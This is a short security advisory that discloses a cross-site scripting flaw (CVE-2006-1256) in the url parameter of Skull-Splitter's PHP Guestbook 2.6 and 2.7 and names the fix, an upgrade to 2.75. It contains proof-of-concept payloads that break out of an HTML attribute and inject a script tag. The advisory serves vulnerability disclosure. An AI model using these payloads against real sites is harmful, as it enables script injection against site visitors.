EV0104.txt

`New eVuln Advisory:  
Skull-Splitter's PHP Guestbook XSS Vulnerability  
http://evuln.com/vulns/104/summary.html  
  
--------------------Summary----------------  
eVuln ID: EV0104  
CVE: CVE-2006-1256  
Software: Skull-Splitter's PHP Guestbook  
Sowtware's Web Site: http://www.boysen.be/  
Versions: 2.6 2.7  
Critical Level: Harmless  
Type: Cross-Site Scripting  
Class: Remote  
Status: Patched  
PoC/Exploit: Available  
Solution: Available  
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)  
  
-----------------Description---------------  
Vulnerable Script: guestbook.php  
  
Parameter url isn't properly sanitized. This can be used to post arbitrary HTML or JavaScript code.  
  
Condition: magic_quotes_gpc = off  
  
--------------PoC/Exploit----------------------  
Available at: http://evuln.com/vulns/104/exploit.html  
  
Cross-Site Scripting Example:  
  
Version 2.6  
  
URL: http://[host]/guestbook.php? part=add_form  
Website: aaa"><script>alert("Vulnerable")</script><aaa a="  
  
  
Version 2.7  
  
URL: http://[host]/guestbook.php? part=add_form  
Website: http://domainbegin"><script>alert("Vulnerable")</script><aaa a="domainend.com  
  
  
--------------Solution---------------------  
To fix this problem install or upgrade to 2.75 version provided by vendor.  
  
--------------Credit-----------------------  
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)  
  
  
Regards,  
Aliaksandr Hartsuyeu  
http://evuln.com - Penetration Testing Services  
.  
`